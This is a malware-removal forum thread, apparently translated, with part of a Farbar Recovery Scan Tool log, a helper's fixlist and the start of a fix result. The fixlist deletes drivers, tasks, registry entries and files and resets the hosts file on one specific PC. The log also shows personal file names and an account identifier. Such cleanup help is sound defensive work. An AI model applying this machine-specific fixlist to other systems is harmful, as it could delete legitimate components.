R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-09-07] (Razer Inc. -> Razer, Inc.)
R3 SbieDrv; D:\windows programy\Sandboxie-Plus\SbieDrv.sys [249368 2022-08-29] (Microsoft Windows Hardware Compatibility Publisher -> Sandboxie-Plus.com)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [40664 2015-02-03] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [39864 2020-04-06] (ProtonVPN AG -> The OpenVPN Project)
R3 VBAudioVMAUXVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmauxvaio64_win7.sys [41192 2019-01-06] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBAudioVMVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmvaio64_win7.sys [41192 2019-01-05] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [239432 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [249344 2020-10-16] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135768 2016-06-28] (Oracle Corporation -> Oracle Corporation)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [22216888 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R1 vmkbd3; C:\Windows\System32\DRIVERS\vmkbd.sys [52288 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R2 VMnetBridge; C:\Windows\System32\DRIVERS\vmnetbridge.sys [66368 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R3 VOICEMOD_Driver; C:\Windows\System32\drivers\vmdrv.sys [31744 2021-12-28] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider)
R0 vsock; C:\Windows\System32\DRIVERS\vsock.sys [103736 2019-08-14] (VMware, Inc. -> VMware, Inc.)
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-x64.sys [52576 2018-02-28] (VMware, Inc. -> VMware, Inc.)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (NGO -> MBB)
R2 WebDriveFSD; C:\Program Files\WebDrive\wdfsd.sys [108960 2018-09-25] (South River Technologies -> South River Technologies, Inc.)
R3 wovad_micarray; C:\Windows\System32\drivers\womic.sys [35696 2017-11-25] (Beijing Wolicheng Technology Co., Ltd. -> Windows (R) Win 7 DDK provider)
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 glavcam; system32\DRIVERS\glavcam.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-24 23:31 - 2023-11-24 23:31 - 000003116 _____ C:\Windows\system32\Tasks\AdwCleaner_onReboot
2023-11-24 09:11 - 2023-11-24 09:11 - 000016451 _____ C:\Users\John\Desktop\malware.txt
2023-11-23 21:18 - 2023-11-25 10:19 - 000000000 ____D C:\Users\John\AppData\Local\Malwarebytes
2023-11-23 21:18 - 2023-11-23 21:18 - 000000812 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2023-11-23 21:18 - 2023-11-23 21:18 - 000000812 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2023-11-23 21:07 - 2023-11-23 21:07 - 000083385 _____ C:\Users\John\Downloads\Addition.zip
2023-11-23 19:29 - 2023-11-23 19:29 - 002383872 _____ (Farbar) C:\Users\John\Downloads\FRST64.exe
2023-11-23 19:27 - 2023-11-23 19:27 - 000000021 _____ C:\Users\John\Desktop\forum viry ucet.txt
2023-11-22 15:23 - 2023-11-22 15:23 - 012383864 _____ (Tim Kosse) C:\Users\John\Downloads\FileZilla_3.66.1_win64-setup.exe
2023-11-22 03:28 - 2023-11-22 03:28 - 000000089 _____ C:\Users\John\Desktop\txt.txt
2023-11-20 22:32 - 2023-11-22 11:41 - 000000131 _____ C:\Users\John\Desktop\praxe chill.txt
2023-11-18 21:58 - 2023-11-18 21:58 - 000731283 _____ C:\Users\John\Downloads\F3-BP-2015-Skrivan-Jaroslav-Bakalarka.pdf
2023-11-18 21:55 - 2023-11-18 21:55 - 000051947 _____ C:\Users\John\Downloads\white-paper-php-performance-checklist.pdf
2023-11-18 21:02 - 2023-11-18 21:02 - 001282692 _____ C:\Users\John\Downloads\Server-Side_Lookup_Optimization_of_A_Web_Service.pdf
2023-11-16 18:50 - 2023-11-16 18:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-Link
2023-11-16 18:49 - 2023-11-16 18:49 - 000000000 ____D C:\Program Files (x86)\TP-Link
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\Drivers\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 001185504 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\Rtlihvs.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000114920 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\RtlExtUI.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000049384 _____ (Windows (R) Server 2003 DDK provider) C:\Windows\system32\rtlCoInst.dll
2023-11-16 18:48 - 2023-11-16 18:49 - 000000000 ____D C:\Users\John\AppData\Local\TP-Link
2023-11-16 18:48 - 2023-11-16 18:48 - 000000000 ____D C:\ProgramData\TP-Link
2023-11-15 08:15 - 2023-11-14 14:28 - 000587065 _____ C:\Users\John\cviko2_231004.ipynb
2023-11-15 08:15 - 2023-11-14 14:28 - 000447921 _____ C:\Users\John\cviko231018.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000629594 _____ C:\Users\John\cviko20231108.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000317529 _____ C:\Users\John\Untitled1.ipynb
2023-11-13 17:48 - 2023-11-13 17:48 - 000001366 _____ C:\Users\John\Desktop\team1 laravel.ffs_gui
2023-11-11 15:50 - 2023-11-11 15:50 - 000000000 ____D C:\Users\John\.mputils
2023-11-10 09:40 - 2023-11-10 09:40 - 000262144 _____ C:\Windows\Minidump\111023-100277-01.dmp
2023-11-07 01:17 - 2023-11-07 01:17 - 000001057 _____ C:\Users\John\Desktop\WinHugs.lnk
2023-11-07 01:17 - 2023-11-07 01:17 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinHugs
2023-11-07 01:15 - 2023-11-07 01:17 - 000000000 ____D C:\Program Files (x86)\WinHugs
2023-11-03 17:27 - 2023-11-03 17:27 - 000002468 _____ C:\Users\John\Desktop\moje upraveny arduno.txt
2023-11-03 12:46 - 2023-11-03 12:21 - 000006143 _____ C:\HTTPClient.cpp
2023-11-03 12:46 - 2023-10-31 21:58 - 000001218 _____ C:\HTTPClient.h
2023-11-03 12:46 - 2023-10-26 13:56 - 000001987 _____ C:\wifly_http.ino
2023-11-03 12:46 - 2023-10-26 13:56 - 000000182 _____ C:\Debug.h
2023-11-02 03:24 - 2023-11-02 03:24 - 003243838 _____ C:\Users\John\Desktop\lol ucet.psd
2023-11-01 13:36 - 2023-11-01 13:36 - 000000339 _____ C:\Users\John\Desktop\nove regexy pre opgg.txt
2023-10-26 19:17 - 2023-10-26 19:23 - 000000000 ____D C:\Users\John\AppData\Local\playit_gg
2023-10-26 19:17 - 2023-10-26 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Playit.gg
2023-10-26 13:50 - 2023-11-09 09:37 - 000000000 ____D C:\Users\John\AppData\Local\Arduino15
2023-10-26 13:50 - 2023-10-26 13:57 - 000000000 ____D C:\Users\John\Documents\Arduino
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\Users\Public\Desktop\Arduino.lnk
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-25 11:53 - 2018-05-27 13:28 - 000047211 _____ C:\Users\John\Downloads\FRST.txt
2023-11-25 11:52 - 2017-02-03 15:18 - 000000000 ____D C:\FRST
2023-11-25 10:56 - 2022-09-30 08:56 - 000000000 ____D C:\Users\John\AppData\Roaming\superProductivity
2023-11-25 10:55 - 2020-07-28 11:17 - 000000000 ____D C:\Users\John\AppData\Local\Discord
2023-11-25 10:55 - 2018-07-28 23:15 - 000000000 ____D C:\Users\John\AppData\Roaming\discord
2023-11-25 10:26 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2023-11-25 10:26 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2023-11-25 10:25 - 2018-06-28 19:47 - 000000000 ____D C:\Users\John\AppData\Local\LogMeIn Hamachi
2023-11-25 10:21 - 2009-07-14 06:13 - 001061310 _____ C:\Windows\system32\PerfStringBackup.INI
2023-11-25 10:21 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2023-11-25 10:20 - 2017-06-12 11:10 - 000000000 ____D C:\ProgramData\VMware
2023-11-25 10:19 - 2016-06-04 15:16 - 000000000 ____D C:\Program Files (x86)\Google
2023-11-25 10:17 - 2020-04-15 23:16 - 000000001 _____ C:\Windows\vgkbootstatus.dat
2023-11-25 10:16 - 2020-11-29 22:35 - 000000000 ____D C:\ProgramData\VirtualBox
2023-11-25 10:16 - 2019-02-03 09:09 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2023-11-25 10:16 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2023-11-25 04:12 - 2016-06-04 16:02 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2023-11-24 09:12 - 2019-01-08 15:42 - 000034241 _____ C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2023-11-24 09:12 - 2016-06-05 17:45 - 000000000 ____D C:\Users\John\AppData\Roaming\TS3Client
2023-11-23 21:16 - 2021-07-29 16:20 - 000000000 ____D C:\ProgramData\Malwarebytes
2023-11-23 21:07 - 2018-05-27 13:31 - 000363316 _____ C:\Users\John\Downloads\Addition.txt
2023-11-23 11:58 - 2017-02-21 16:47 - 000000000 ____D C:\Users\John\AppData\Roaming\obs-studio
2023-11-23 10:32 - 2021-07-29 08:59 - 000000400 __RSH C:\ProgramData\ntuser.pol
2023-11-22 21:38 - 2016-09-10 17:45 - 000000000 ____D C:\Program Files (x86)\Opera
2023-11-22 16:15 - 2016-08-21 23:14 - 000000000 ____D C:\Users\John\AppData\Roaming\FileZilla
2023-11-22 15:32 - 2022-01-09 22:28 - 000000000 ____D C:\Users\John\AppData\Roaming\Signal
2023-11-22 12:42 - 2022-05-28 18:10 - 000000000 ____D C:\Users\John\AppData\Roaming\ImageGlass
2023-11-22 11:43 - 2018-03-11 14:57 - 000228136 _____ C:\Users\John\AppData\Local\GDIPFONTCACHEV1.DAT
2023-11-22 10:41 - 2018-03-12 09:31 - 005633824 _____ C:\Windows\system32\FNTCACHE.DAT
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Roaming\VMware
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Local\VMware
2023-11-21 16:56 - 2021-07-20 10:12 - 000003832 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1473525916
2023-11-20 22:31 - 2023-01-23 13:25 - 000000000 ____D C:\Users\John\AppData\Local\KeePassXC
2023-11-19 20:02 - 2016-06-05 14:18 - 000000000 ____D C:\ProgramData\Riot Games
2023-11-19 14:33 - 2019-01-31 03:33 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2023-11-17 14:27 - 2021-03-31 18:56 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\PowerPoint
2023-11-17 11:42 - 2021-03-29 12:13 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Excel
2023-11-17 11:37 - 2016-06-04 15:16 - 000000000 ____D C:\Users\John\AppData\Local\Deployment
2023-11-16 19:24 - 2016-06-04 16:36 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent
2023-11-16 19:21 - 2019-06-04 22:22 - 000000000 ____D C:\Users\John\AppData\Local\BitTorrentHelper
2023-11-16 19:03 - 2020-01-06 15:07 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent 2.2
2023-11-16 19:00 - 2020-03-13 19:30 - 000000000 ____D C:\Users\John\AppData\Local\CrashDumps
2023-11-16 18:59 - 2019-10-01 14:26 - 000000000 ____D C:\Users\John\AppData\Roaming\Wireshark
2023-11-16 18:49 - 2018-05-27 10:31 - 000000000 ____D C:\Temp
2023-11-16 18:49 - 2016-06-04 15:09 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2023-11-15 23:27 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Postman
2023-11-15 21:52 - 2020-07-24 18:13 - 000045056 _____ C:\Users\John\.wakatime.db
2023-11-15 21:52 - 2016-06-04 14:57 - 000000000 ____D C:\Users\John
2023-11-15 08:19 - 2023-01-22 15:03 - 000000000 ____D C:\Users\John\AppData\Roaming\Python
2023-11-15 08:13 - 2017-02-20 12:40 - 000000000 ____D C:\Users\John\New folder
2023-11-14 08:45 - 2023-03-21 20:28 - 000003628 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
2023-11-14 08:45 - 2023-03-21 20:28 - 000003500 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
2023-11-13 18:14 - 2023-04-23 11:37 - 000002106 _____ C:\Users\John\Desktop\Postman.lnk
2023-11-13 18:14 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Postman
2023-11-11 21:28 - 2020-12-14 00:48 - 000138240 ___SH C:\Users\John\Documents\Thumbs.db
2023-11-11 15:50 - 2023-04-02 11:22 - 000000000 ____D C:\Users\John\AppData\Roaming\.minecraft
2023-11-11 15:41 - 2020-03-17 01:47 - 000000000 ____D C:\Users\John\AppData\Roaming\.tlauncher
2023-11-10 09:40 - 2016-07-24 21:43 - 000000000 ____D C:\Windows\Minidump
2023-11-09 14:45 - 2023-05-01 10:15 - 000000000 ____D C:\Users\John\AppData\Local\Postman
2023-11-07 22:21 - 2021-01-20 14:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Authy Desktop
2023-11-03 13:22 - 2017-12-14 02:01 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Word
2023-11-02 12:01 - 2022-12-08 13:49 - 000000112 _____ C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2023-11-02 00:39 - 2023-09-05 22:43 - 001042153 ____N C:\Windows\Minidump\110223-103491-01.dmp
2023-10-27 18:21 - 2021-04-04 12:00 - 000003434 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2023-10-27 18:21 - 2021-04-04 12:00 - 000003306 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore

==================== Files in the root of some directories ========

2020-05-03 14:07 - 2020-05-03 14:07 - 000000048 ____H () C:\Program Files (x86)\8iq24splw1.dat
2018-12-26 11:13 - 2023-08-12 09:04 - 000000033 _____ () C:\Users\John\AppData\Roaming\AdobeWLCMCache.dat
2020-06-18 22:09 - 2020-06-18 22:09 - 000000068 _____ () C:\Users\John\AppData\Roaming\changzhi_leidian.data
2019-07-14 00:42 - 2020-06-27 12:52 - 000000808 _____ () C:\Users\John\AppData\Roaming\jd-gui.cfg
2018-12-26 11:41 - 2021-07-13 10:52 - 000000028 _____ () C:\Users\John\AppData\Roaming\kulerdata.json
2022-12-08 13:49 - 2023-11-02 12:01 - 000000112 _____ () C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2022-09-04 13:34 - 2022-09-04 13:34 - 000000142 ___SH () C:\Users\John\AppData\Roaming\UOD.DAT
2019-01-08 15:42 - 2023-11-24 09:12 - 000034241 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2019-01-05 02:03 - 2019-01-06 17:26 - 000004634 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterDefault.xml
2022-07-29 00:24 - 2022-07-29 00:24 - 000000142 ___SH () C:\Users\John\AppData\Roaming\YINSLITO.DLL
2022-09-04 17:34 - 2022-09-04 17:34 - 000000142 ___SH () C:\Users\John\AppData\Local\700937146F5B4E19A662A91210046348.rct
2016-11-26 21:00 - 2019-10-04 07:27 - 000001480 _____ () C:\Users\John\AppData\Local\Adobe Uložit pro web 13.0 Prefs
2018-09-06 08:27 - 2018-09-06 08:27 - 000001111 _____ () C:\Users\John\AppData\Local\gamma_ramp.reg
2018-01-28 23:40 - 2023-09-28 14:32 - 000000600 _____ () C:\Users\John\AppData\Local\PUTTY.RND
2021-11-18 10:20 - 2021-11-18 10:20 - 000002939 _____ () C:\Users\John\AppData\Local\recently-used.xbel
2018-07-27 13:26 - 2018-07-27 13:26 - 000000487 _____ () C:\Users\John\AppData\Local\ReclaiMe.config
2017-06-16 14:06 - 2023-10-23 21:37 - 000007665 _____ () C:\Users\John\AppData\Local\Resmon.ResmonCfg
2019-03-04 16:27 - 2019-03-04 16:27 - 000000003 _____ () C:\Users\John\AppData\Local\updater.log
2019-03-04 16:27 - 2019-03-04 16:27 - 000000425 _____ () C:\Users\John\AppData\Local\UserProducts.xml

==================== FLock ==============================

2017-10-27 23:09 C:\Windows\infpub.dat

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-09-04 01:24
==================== End of FRST.txt ========================

Re: Logging in to FB, windows opening in the browser

Posted: 25 Nov 2023 15:35
by Rudy
Open Notepad and copy the following into it:
Start

CloseProcesses:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
C:\Program Files (x86)\8iq24splw1.dat
C:\Users\John\AppData\Roaming\changzhi_leidian.data
ContextMenuHandlers1: [GDContextMenu] -> [CC]{BB02B294-8425-42E5-983F-41A1FA970CD6} => -> No File
ContextMenuHandlers1: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers4: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers1_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
ContextMenuHandlers6_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
AlternateDataStreams: C:\Windows\system32\-1.14-windows.xml:B72225CA78 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0:74DBE02D40 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0:23D10F59A6 [10]
AlternateDataStreams: C:\Windows\system32\AcpiServiceVnA64.dll:ECA79956BD [10]
AlternateDataStreams: C:\ProgramData\DP45977C.lfl:677104FCAA [10]
AlternateDataStreams: C:\ProgramData\ReclaiMe.config:AC4DBEED78 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk:8ACB4E955C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk:D8006AA692 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk:0E0659E205 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk:37833A1060 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk:38307C6C28 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk:DAEDFEEC9C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk:742FE07988 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk:6306D2B3A2 [10]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [83]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [2716]
FirewallRules: [{381E8692-D05F-4768-A03E-BFB42D82C8D3}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{030F7113-6734-41CD-A4E5-D34B67B56903}] => (Block) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [{5990ECB6-4B3B-4441-A614-264DCBBF16F2}] => (Allow) I:\windows programy\davinci\ElementsPanelDaemon.exe => No File
FirewallRules: [{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}] => (Allow) I:\windows programy\davinci\OxygenPanelDaemon.exe => No File
FirewallRules: [{257BE348-CCF6-4567-A911-19F0393770BC}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe => No File

EmptyTemp:
Hosts:
End
Save it to C:\Users\John\Downloads as fixlist.txt. Run FRST again and click >Fix<. When the action finishes, a log will appear; copy it here.

Re: Logging in to FB, windows opening in the browser

Posted: 18 Feb 2024 10:26
by mivefe5888
Fix result of Farbar Recovery Scan Tool (x64) Version: 16.02.2024
Ran by John (18-02-2024 10:10:50) Run:12
Running from C:\Users\John\Downloads
Loaded Profiles: John & Test
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
